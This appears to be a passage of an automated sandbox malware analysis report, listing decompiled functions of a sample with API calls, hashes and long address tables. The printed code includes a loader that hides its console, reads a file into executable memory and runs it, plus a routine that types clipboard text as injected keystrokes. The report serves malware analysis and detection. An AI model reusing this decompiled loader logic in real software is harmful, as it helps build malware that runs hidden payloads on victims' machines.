                                                  0x00409702
                                                  0x00409703
                                                  0x00409704
                                                  0x00409705
                                                  0x00409706
                                                  0x00409707
                                                  0x00409708
                                                  0x00409709
                                                  0x0040970a
                                                  0x0040970b
                                                  0x0040970c
                                                  0x0040970d
                                                  0x0040970e
                                                  0x00409711
                                                  0x00409715
                                                  0x00409716
                                                  0x00409717
                                                  0x00409718
                                                  0x00409719
                                                  0x0040971a
                                                  0x0040971b
                                                  0x0040971c
                                                  0x0040971d
                                                  0x0040971e
                                                  0x0040971f
                                                  0x00409729
                                                  0x00409730
                                                  0x00409737
                                                  0x0040973e
                                                  0x00409748
                                                  0x00409752
                                                  0x00409759
                                                  0x00409762
                                                  0x00409769
                                                  0x0040976f
                                                  0x00409774
                                                  0x00409779
                                                  0x0040977c
                                                  0x00409783
                                                  0x00409797
                                                  0x0040979c
                                                  0x004097b6
                                                  0x004097c0
                                                  0x004097c6
                                                  0x004097d5
                                                  0x004097e5
                                                  0x004097eb
                                                  0x00409803
                                                  0x00409809
                                                  0x0040981a
                                                  0x0040982d
                                                  0x00409840
                                                  0x00409853
                                                  0x0040986a
                                                  0x0040987e
                                                  0x00409891
                                                  0x004098a4
                                                  0x004098b8
                                                  0x004098cc
                                                  0x004098df
                                                  0x004098f6
                                                  0x0040990d
                                                  0x00409921
                                                  0x00409938
                                                  0x0040994c
                                                  0x00409960
                                                  0x00409974
                                                  0x00409988
                                                  0x0040999f
                                                  0x004099a7
                                                  0x004099ad
                                                  0x004099b0
                                                  0x00000000
                                                  0x00000000
                                                  0x004099b2
                                                  0x004099bd
                                                  0x004099c7
                                                  0x004099cc
                                                  0x004099cf
                                                  0x004099e1
                                                  0x004099e4
                                                  0x004099e7
                                                  0x00000000
                                                  0x00000000
                                                  0x004099e9
                                                  0x004099db
                                                  0x004099db
                                                  0x004099de
                                                  0x004099de
                                                  0x004099fb
                                                  0x00409a00
                                                  0x00409a06
                                                  0x00409a0c
                                                  0x00409a16
                                                  0x00409a18
                                                  0x00409a1e
                                                  0x00409a1f
                                                  0x00409a24
                                                  0x00409a27
                                                  0x00409a2c
                                                  0x00409a33
                                                  0x00409a3f
                                                  0x00409a51
                                                  0x00409a51
                                                  0x00409a54
                                                  0x00409a57
                                                  0x00000000
                                                  0x00000000
                                                  0x00409a5d
                                                  0x00409a6d
                                                  0x00409a70
                                                  0x00409a70
                                                  0x00409a73
                                                  0x00409a76
                                                  0x00409a7d
                                                  0x00409a80
                                                  0x00000000
                                                  0x00000000
                                                  0x00409a82
                                                  0x00409a87
                                                  0x00409aac
                                                  0x00409aac
                                                  0x00409a89
                                                  0x00409a89
                                                  0x00409a8c
                                                  0x00409a90
                                                  0x00409a97
                                                  0x00409a97
                                                  0x00409a9b
                                                  0x00000000
                                                  0x00409a9d
                                                  0x00409a9d
                                                  0x00409aa1
                                                  0x00409aa5
                                                  0x00409aaa
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00409aaa
                                                  0x00409a9b
                                                  0x00409abd
                                                  0x00409ac0
                                                  0x00409ac6
                                                  0x00409acd
                                                  0x00409adb
                                                  0x00409aeb
                                                  0x00409aee
                                                  0x00409aee
                                                  0x00409af1
                                                  0x00409af4
                                                  0x00409afb
                                                  0x00409afe
                                                  0x00000000
                                                  0x00000000
                                                  0x00409b00
                                                  0x00409b05
                                                  0x00409b2a
                                                  0x00409b2a
                                                  0x00409b07
                                                  0x00409b07
                                                  0x00409b0a
                                                  0x00409b0e
                                                  0x00409b15
                                                  0x00409b15
                                                  0x00409b19
                                                  0x00000000
                                                  0x00409b1b
                                                  0x00409b1b
                                                  0x00409b1f
                                                  0x00409b23
                                                  0x00409b28
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00409b28
                                                  0x00409b19
                                                  0x00409b3b
                                                  0x00409b3e
                                                  0x00409b44
                                                  0x00409b4b
                                                  0x00409b6d
                                                  0x00409b7d
                                                  0x00409b80
                                                  0x00409b80
                                                  0x00409b83
                                                  0x00409b86
                                                  0x00409b8d
                                                  0x00409b90
                                                  0x00000000
                                                  0x00000000
                                                  0x00409b92
                                                  0x00409b97
                                                  0x00409bbc
                                                  0x00409bbc
                                                  0x00409b99
                                                  0x00409b99
                                                  0x00409b9c
                                                  0x00409ba0
                                                  0x00409ba7
                                                  0x00409ba7
                                                  0x00409bab
                                                  0x00000000
                                                  0x00409bad
                                                  0x00409bad
                                                  0x00409bb1
                                                  0x00409bb5
                                                  0x00409bba
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00409bba
                                                  0x00409bab
                                                  0x00409bcd
                                                  0x00409bd0
                                                  0x00409bd6
                                                  0x00409bdd
                                                  0x00409c46
                                                  0x00409c56
                                                  0x00409c59
                                                  0x00409c59
                                                  0x00409c5c
                                                  0x00409c5f
                                                  0x00409c66
                                                  0x00409c69
                                                  0x00000000
                                                  0x00000000
                                                  0x00409c6b
                                                  0x00409c70
                                                  0x00409c95
                                                  0x00409c95
                                                  0x00409c72
                                                  0x00409c72
                                                  0x00409c75
                                                  0x00409c79
                                                  0x00409c80
                                                  0x00409c80
                                                  0x00409c84
                                                  0x00000000
                                                  0x00409c86
                                                  0x00409c86
                                                  0x00409c8a
                                                  0x00409c8e
                                                  0x00409c93
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00409c93
                                                  0x00409c84
                                                  0x00409cac
                                                  0x00409cb2
                                                  0x00409cb8
                                                  0x00409cbf
                                                  0x00409d28
                                                  0x00409d38
                                                  0x00409d3b
                                                  0x00409d3b
                                                  0x00409d3e
                                                  0x00409d41
                                                  0x00409d48
                                                  0x00409d4b
                                                  0x00000000
                                                  0x00000000
                                                  0x00409d4d
                                                  0x00409d52
                                                  0x00409d77
                                                  0x00409d77
                                                  0x00409d54
                                                  0x00409d54
                                                  0x00409d57
                                                  0x00409d5b
                                                  0x00409d62
                                                  0x00409d62
                                                  0x00409d66
                                                  0x00000000
                                                  0x00409d68
                                                  0x00409d68
                                                  0x00409d6c
                                                  0x00409d70
                                                  0x00409d75
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00409d75
                                                  0x00409d66
                                                  0x00409d8e
                                                  0x00409d94
                                                  0x00409d9a
                                                  0x00409da1
                                                  0x00409df5
                                                  0x00409e05
                                                  0x00409e08
                                                  0x00409e08
                                                  0x00409e0b
                                                  0x00409e0e
                                                  0x00409e15
                                                  0x00409e18
                                                  0x00000000
                                                  0x00000000
                                                  0x00409e1a
                                                  0x00409e1f
                                                  0x00409e44
                                                  0x00409e44
                                                  0x00409e21
                                                  0x00409e21
                                                  0x00409e24
                                                  0x00409e28
                                                  0x00409e2f
                                                  0x00409e2f
                                                  0x00409e33
                                                  0x00000000
                                                  0x00409e35
                                                  0x00409e35
                                                  0x00409e39
                                                  0x00409e3d
                                                  0x00409e42
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00409e42
                                                  0x00409e33
                                                  0x00409e5b
                                                  0x00409e61
                                                  0x00409e67
                                                  0x00409e6e
                                                  0x00409ec1
                                                  0x00409e70
                                                  0x00409e76
                                                  0x00409e7c
                                                  0x00409e7f
                                                  0x00409e9b
                                                  0x00409ea0
                                                  0x00409ea3
                                                  0x00409eae
                                                  0x00409eb0
                                                  0x00000000
                                                  0x00409eb2
                                                  0x00409eb2
                                                  0x00409eb2
                                                  0x00409e81
                                                  0x00409e81
                                                  0x00409e81
                                                  0x00409e7f
                                                  0x00000000
                                                  0x00409e6e
                                                  0x00409e50
                                                  0x00409e52
                                                  0x00409e52
                                                  0x00409e55
                                                  0x00000000
                                                  0x00409da3
                                                  0x00409da9
                                                  0x00409daf
                                                  0x00409db2
                                                  0x00409dce
                                                  0x00409dd3
                                                  0x00409dd6
                                                  0x00409de2
                                                  0x00409de4
                                                  0x00000000
                                                  0x00409de6
                                                  0x00409de6
                                                  0x00409de6
                                                  0x00409db4
                                                  0x00409db4
                                                  0x00409db4
                                                  0x00409db2
                                                  0x00000000
                                                  0x00409da1
                                                  0x00409d83
                                                  0x00409d85
                                                  0x00409d85
                                                  0x00409d88
                                                  0x00000000
                                                  0x00409cc1
                                                  0x00409cc7
                                                  0x00409ccd
                                                  0x00409cd0
                                                  0x00409cec
                                                  0x00409cf1
                                                  0x00409cf4
                                                  0x00409cf7
                                                  0x00409cfb
                                                  0x00409d06
                                                  0x00409d06
                                                  0x00409d0d
                                                  0x00000000
                                                  0x00409d0f
                                                  0x00409d15
                                                  0x00409d17
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00409d17
                                                  0x00409cfd
                                                  0x00409cfd
                                                  0x00409d04
                                                  0x00409d19
                                                  0x00409d19
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00409d04
                                                  0x00409cd2
                                                  0x00409cd2
                                                  0x00409cd2
                                                  0x00409cd0
                                                  0x00000000
                                                  0x00409cbf
                                                  0x00409ca1
                                                  0x00409ca3
                                                  0x00409ca3
                                                  0x00409ca6
                                                  0x00000000
                                                  0x00409bdf
                                                  0x00409be5
                                                  0x00409beb
                                                  0x00409bee
                                                  0x00409c0a
                                                  0x00409c0f
                                                  0x00409c12
                                                  0x00409c15
                                                  0x00409c19
                                                  0x00409c24
                                                  0x00409c24
                                                  0x00409c2b
                                                  0x00000000
                                                  0x00409c2d
                                                  0x00409c33
                                                  0x00409c35
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00409c35
                                                  0x00409c1b
                                                  0x00409c1b
                                                  0x00409c22
                                                  0x00409c37
                                                  0x00409c37
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00409c22
                                                  0x00409bf0
                                                  0x00409bf0
                                                  0x00409bf0
                                                  0x00409bee
                                                  0x00000000
                                                  0x00409bdd
                                                  0x00409bc5
                                                  0x00409bc7
                                                  0x00409bc7
                                                  0x00409bca
                                                  0x00000000
                                                  0x00409b4d
                                                  0x00409b4d
                                                  0x00409b57
                                                  0x00409b61
                                                  0x00000000
                                                  0x00409b61
                                                  0x00000000
                                                  0x00409b4b
                                                  0x00409b33
                                                  0x00409b35
                                                  0x00409b35
                                                  0x00409b38
                                                  0x00000000
                                                  0x00409acf
                                                  0x00409acf
                                                  0x00409a48
                                                  0x00409a4b
                                                  0x00409a4b
                                                  0x00409a4e
                                                  0x00000000
                                                  0x00409a4e
                                                  0x00000000
                                                  0x00409acd
                                                  0x00409ab5
                                                  0x00409ab7
                                                  0x00409ab7
                                                  0x00409aba
                                                  0x00000000
                                                  0x00409aba
                                                  0x00409ed0
                                                  0x00409ed7
                                                  0x00409ee3
                                                  0x00409ee7
                                                  0x00409ee9
                                                  0x00409ee9
                                                  0x00409ef0
                                                  0x00409ef4
                                                  0x00409ef6
                                                  0x00409ef6
                                                  0x00409efd
                                                  0x00409f11
                                                  0x00409f16
                                                  0x00409f1d
                                                  0x00409f29
                                                  0x00409f2d
                                                  0x00409f9c
                                                  0x00409fa1
                                                  0x00409fa3
                                                  0x00409fb6
                                                  0x00409fc2
                                                  0x00409fc8
                                                  0x00409fc8
                                                  0x00409fcb
                                                  0x00409fd1
                                                  0x00409fd7
                                                  0x00409fdb
                                                  0x00409fdf
                                                  0x00409fdf
                                                  0x00409ff1
                                                  0x0040a00c
                                                  0x0040a017
                                                  0x0040a01a
                                                  0x0040a02b
                                                  0x0040a01c
                                                  0x0040a023
                                                  0x0040a023
                                                  0x0040a03c
                                                  0x0040a043
                                                  0x00000000
                                                  0x00409fa5
                                                  0x00409fa5
                                                  0x00409fa5
                                                  0x00409f2f
                                                  0x00409f37
                                                  0x00409f44
                                                  0x00409f49
                                                  0x00409f50
                                                  0x00409f5b
                                                  0x00409f60
                                                  0x00409f65
                                                  0x00409f6c
                                                  0x00409f86
                                                  0x00000000
                                                  0x00409f6e
                                                  0x00409f73
                                                  0x00409f78
                                                  0x00409f7a
                                                  0x00000000
                                                  0x00409f7c
                                                  0x00409f7c
                                                  0x00409f7c
                                                  0x00409f7a
                                                  0x00409f52
                                                  0x00409f52
                                                  0x00409f59
                                                  0x00409f88
                                                  0x00409f92
                                                  0x0040a049
                                                  0x0040a055
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00409f59
                                                  0x00409f50
                                                  0x00409f1f
                                                  0x00409f1f
                                                  0x00409f1f
                                                  0x00409ed9
                                                  0x00409ed9
                                                  0x00409ed9
                                                  0x00409a35
                                                  0x00409a35
                                                  0x00409a35
                                                  0x00409785
                                                  0x00409785
                                                  0x00409785
                                                  0x0040a05a
                                                  0x0040a05d

                                                  APIs
                                                  • GetConsoleWindow.KERNELBASE(00000000), ref: 00409762
                                                  • ShowWindow.USER32(00000000), ref: 00409769
                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004097C0
                                                  • GetFileSize.KERNEL32(?,00000000), ref: 004097CF
                                                  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 004097E5
                                                  • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00409803
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: File$Window$AllocConsoleCreateReadShowSizeVirtual
                                                  • String ID:
                                                  • API String ID: 3075330158-0
                                                  • Opcode ID: b1f80ec61ccdadc99d9863e4de904c203012d3e5882bac9c5da239e59a9ae882
                                                  • Instruction ID: 1f1830d2cc23a779246c836cc2d3b1d70898170df23fe81b838c687a25145776
                                                  • Opcode Fuzzy Hash: b1f80ec61ccdadc99d9863e4de904c203012d3e5882bac9c5da239e59a9ae882
                                                  • Instruction Fuzzy Hash: F5F03AB1D0521D9BEB109FA0DC1D7EFBBB4AB04305F0045A9E5086A281D7B9065A8FE6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00410F9D Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 100%
                                                  			E00410F9D() {
				void* _t3;
				void* _t16;
				WCHAR* _t17;

				_t17 = GetEnvironmentStringsW();
				if(_t17 != 0) {
					_t11 = E00410F66(_t17) - _t17 & 0xfffffffe;
					_t3 = E0040F5FB(E00410F66(_t17) - _t17 & 0xfffffffe); // executed
					_t16 = _t3;
					if(_t16 != 0) {
						E0040CC90(_t16, _t17, _t11);
					}
					E0040F5C1(0);
					FreeEnvironmentStringsW(_t17);
				} else {
					_t16 = 0;
				}
				return _t16;
			}






                                                  0x00410fa7
                                                  0x00410fab
                                                  0x00410fbc
                                                  0x00410fc0
                                                  0x00410fc5
                                                  0x00410fcb
                                                  0x00410fd0
                                                  0x00410fd5
                                                  0x00410fda
                                                  0x00410fe1
                                                  0x00410fad
                                                  0x00410fad
                                                  0x00410fad
                                                  0x00410fec

                                                  APIs
                                                  • GetEnvironmentStringsW.KERNEL32 ref: 00410FA1
                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00410FE1
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: EnvironmentStrings$Free
                                                  • String ID:
                                                  • API String ID: 3328510275-0
                                                  • Opcode ID: ecaf961217ba24798a3e562224b46b8b9cc30bf0b2898681761cef4eb6f5ca9a
                                                  • Instruction ID: c0dea6dba9ea9b9d10109c6112a7322ed234caaed7fb7ba3f99f9463da3d7151
                                                  • Opcode Fuzzy Hash: ecaf961217ba24798a3e562224b46b8b9cc30bf0b2898681761cef4eb6f5ca9a
                                                  • Instruction Fuzzy Hash: DEE0EC37148A1136D13132367C8A9DB0909CBC5675725013BF019512C2EEE84C8701A9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040F5FB Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 547 40f5fb-40f607 548 40f639-40f644 call 40f9f9 547->548 549 40f609-40f60b 547->549 556 40f646-40f648 548->556 551 40f624-40f635 RtlAllocateHeap 549->551 552 40f60d-40f60e 549->552 553 40f610-40f617 call 40f036 551->553 554 40f637 551->554 552->551 553->548 559 40f619-40f622 call 4127fd 553->559 554->556 559->548 559->551
                                                  C-Code - Quality: 100%
                                                  			E0040F5FB(long _a4) {
				void* _t4;
				long _t8;

				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E0040F9F9(__eflags))) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x421ad0, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E0040F036();
					if(__eflags == 0) {
						goto L7;
					}
					__eflags = E004127FD(__eflags, _t8);
					if(__eflags == 0) {
						goto L7;
					}
				}
				return _t4;
			}





                                                  0x0040f601
                                                  0x0040f607
                                                  0x0040f639
                                                  0x0040f63e
                                                  0x0040f644
                                                  0x00000000
                                                  0x0040f644
                                                  0x0040f60b
                                                  0x0040f60d
                                                  0x0040f60d
                                                  0x0040f624
                                                  0x0040f62d
                                                  0x0040f635
                                                  0x00000000
                                                  0x00000000
                                                  0x0040f615
                                                  0x0040f617
                                                  0x00000000
                                                  0x00000000
                                                  0x0040f620
                                                  0x0040f622
                                                  0x00000000
                                                  0x00000000
                                                  0x0040f622
                                                  0x00000000

                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00000000,?,?,?,00402F6E,?,?,0040106B,?,00000000), ref: 0040F62D
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: c209d98f1f09c46a0debf532e3f4cf91b806f176d4b977b482a0fc4de4d18bdc
                                                  • Instruction ID: 84bcbb8e3d09251f8ae8c446c74762163e988d77e39962f9827874327a5579b4
                                                  • Opcode Fuzzy Hash: c209d98f1f09c46a0debf532e3f4cf91b806f176d4b977b482a0fc4de4d18bdc
                                                  • Instruction Fuzzy Hash: 05E0E53120061166D7302B769C01B5B368DAB513A0F150537AC14F2AF1CEBACC0B89ED
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  Function 004050C0 Relevance: 12.1, APIs: 8, Instructions: 117clipboardkeyboardCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E004050C0(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				unsigned int _v24;
				int _v28;
				char _v68;
				int _t63;
				intOrPtr* _t105;
				intOrPtr* _t121;
				void* _t126;
				void* _t127;

				_t63 = OpenClipboard( *(_a4 + 0xa8));
				if(_t63 != 0) {
					_v16 = GetClipboardData(0xd);
					if(_v16 == 0) {
						L12:
						return CloseClipboard();
					}
					_v20 = GlobalLock(_v16);
					if(_v20 == 0) {
						goto L12;
					}
					_v24 = GlobalSize(_v16) >> 1;
					 *((short*)(_t127 + 0xffffffffffffffc0)) = 1;
					 *((short*)(_t127 + 0xffffffffffffffc8)) = 0;
					 *(_t127 + 0xffffffffffffffd0) = 0;
					 *((intOrPtr*)(_t127 + 0xffffffffffffffc4)) = 1;
					_v12 = 0;
					while(_v12 < _v24) {
						_v8 = VkKeyScanW( *(_v20 + _v12 * 2) & 0x0000ffff);
						 *(_t127 + 0xffffffffffffffca) = _v8 & 0xff;
						 *((short*)(_t127 + 0xffffffffffffffcc)) = MapVirtualKeyW(_v8 & 0xff, 0);
						 *((short*)(_t127 + 0xffffffffffffffce)) =  *(_v20 + _v12 * 2);
						_t121 = _t127 + 0xffffffffffffffc0;
						_t105 = _t127 + 0xbadb6d;
						 *_t105 =  *_t121;
						 *((intOrPtr*)(_t105 + 4)) =  *((intOrPtr*)(_t121 + 4));
						 *((intOrPtr*)(_t105 + 8)) =  *((intOrPtr*)(_t121 + 8));
						 *((intOrPtr*)(_t105 + 0xc)) =  *((intOrPtr*)(_t121 + 0xc));
						 *((intOrPtr*)(_t105 + 0x10)) =  *((intOrPtr*)(_t121 + 0x10));
						 *(_t127 + 0xbadb71) = 0;
						if(_v12 != _v24 - 1) {
							_v28 = 0;
						} else {
							_v28 = 1;
						}
						E0040A190(_t126, _a4,  &_v68, 2, _v28);
						_v12 = _v12 + 1;
					}
					GlobalUnlock(_v16);
					goto L12;
				}
				return _t63;
			}















                                                  0x004050d0
                                                  0x004050d8
                                                  0x004050e7
                                                  0x004050ee
                                                  0x00405264
                                                  0x00000000
                                                  0x00405264
                                                  0x004050fe
                                                  0x00405105
                                                  0x00000000
                                                  0x00000000
                                                  0x00405117
                                                  0x00405127
                                                  0x00405136
                                                  0x00405143
                                                  0x00405153
                                                  0x0040515b
                                                  0x0040516d
                                                  0x0040518a
                                                  0x004051a4
                                                  0x004051c7
                                                  0x004051de
                                                  0x004051eb
                                                  0x004051f7
                                                  0x004051fd
                                                  0x00405202
                                                  0x00405208
                                                  0x0040520e
                                                  0x00405214
                                                  0x0040521f
                                                  0x00405230
                                                  0x0040523b
                                                  0x00405232
                                                  0x00405232
                                                  0x00405232
                                                  0x00405250
                                                  0x0040516a
                                                  0x0040516a
                                                  0x0040525e
                                                  0x00000000
                                                  0x0040525e
                                                  0x00000000

                                                  APIs
                                                  • OpenClipboard.USER32(?), ref: 004050D0
                                                  • GetClipboardData.USER32 ref: 004050E1
                                                  • GlobalLock.KERNEL32 ref: 004050F8
                                                  • GlobalSize.KERNEL32(00000000), ref: 0040510F
                                                  • VkKeyScanW.USER32(?), ref: 00405184
                                                  • MapVirtualKeyW.USER32(00000000,00000000), ref: 004051B9
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: ClipboardGlobal$DataLockOpenScanSizeVirtual
                                                  • String ID:
                                                  • API String ID: 3765462330-0
                                                  • Opcode ID: 989953fcf0857569b48868dfdd7210a9b5518f73ba3c5d9c920e786e1040871a
                                                  • Instruction ID: d88f2d8c5872141683ffe86d8c3a705b25b32a3e3d496fe11308d2db836d4910
                                                  • Opcode Fuzzy Hash: 989953fcf0857569b48868dfdd7210a9b5518f73ba3c5d9c920e786e1040871a
                                                  • Instruction Fuzzy Hash: BE510774A002099FDB04DFA8C4947AEBBB5FF44300F10857EDA15AB3A0D7799941CB95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040F790 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  C-Code - Quality: 76%
                                                  			E0040F790(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				signed int _t40;
				char* _t47;
				char* _t49;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr _t67;
				int _t68;
				intOrPtr _t69;
				signed int _t70;

				_t69 = __esi;
				_t67 = __edi;
				_t66 = __edx;
				_t61 = __ebx;
				_t40 =  *0x41f638; // 0x3fbdb919
				_t41 = _t40 ^ _t70;
				_v8 = _t40 ^ _t70;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E0040ABEB(_t41);
					_pop(_t62);
				}
				E0040D210(_t67,  &_v804, 0, 0x50);
				E0040D210(_t67,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t62;
				_v556 = _t66;
				_v560 = _t61;
				_v564 = _t69;
				_v568 = _t67;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t68 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				if(UnhandledExceptionFilter( &_v812) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					E0040ABEB(_t57);
				}
				return E0040AE5B(_v8 ^ _t70);
			}




































                                                  0x0040f790
                                                  0x0040f790
                                                  0x0040f790
                                                  0x0040f790
                                                  0x0040f79b
                                                  0x0040f7a0
                                                  0x0040f7a2
                                                  0x0040f7aa
                                                  0x0040f7ac
                                                  0x0040f7af
                                                  0x0040f7b4
                                                  0x0040f7b4
                                                  0x0040f7c0
                                                  0x0040f7d3
                                                  0x0040f7e1
                                                  0x0040f7e7
                                                  0x0040f7ed
                                                  0x0040f7f3
                                                  0x0040f7f9
                                                  0x0040f7ff
                                                  0x0040f805
                                                  0x0040f80b
                                                  0x0040f811
                                                  0x0040f817
                                                  0x0040f81e
                                                  0x0040f825
                                                  0x0040f82c
                                                  0x0040f833
                                                  0x0040f83a
                                                  0x0040f841
                                                  0x0040f842
                                                  0x0040f84b
                                                  0x0040f851
                                                  0x0040f854
                                                  0x0040f85a
                                                  0x0040f867
                                                  0x0040f870
                                                  0x0040f879
                                                  0x0040f882
                                                  0x0040f890
                                                  0x0040f892
                                                  0x0040f8a7
                                                  0x0040f8b3
                                                  0x0040f8b6
                                                  0x0040f8bb
                                                  0x0040f8c8

                                                  APIs
                                                  • IsDebuggerPresent.KERNEL32 ref: 0040F888
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040F892
                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 0040F89F
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmpDownload File
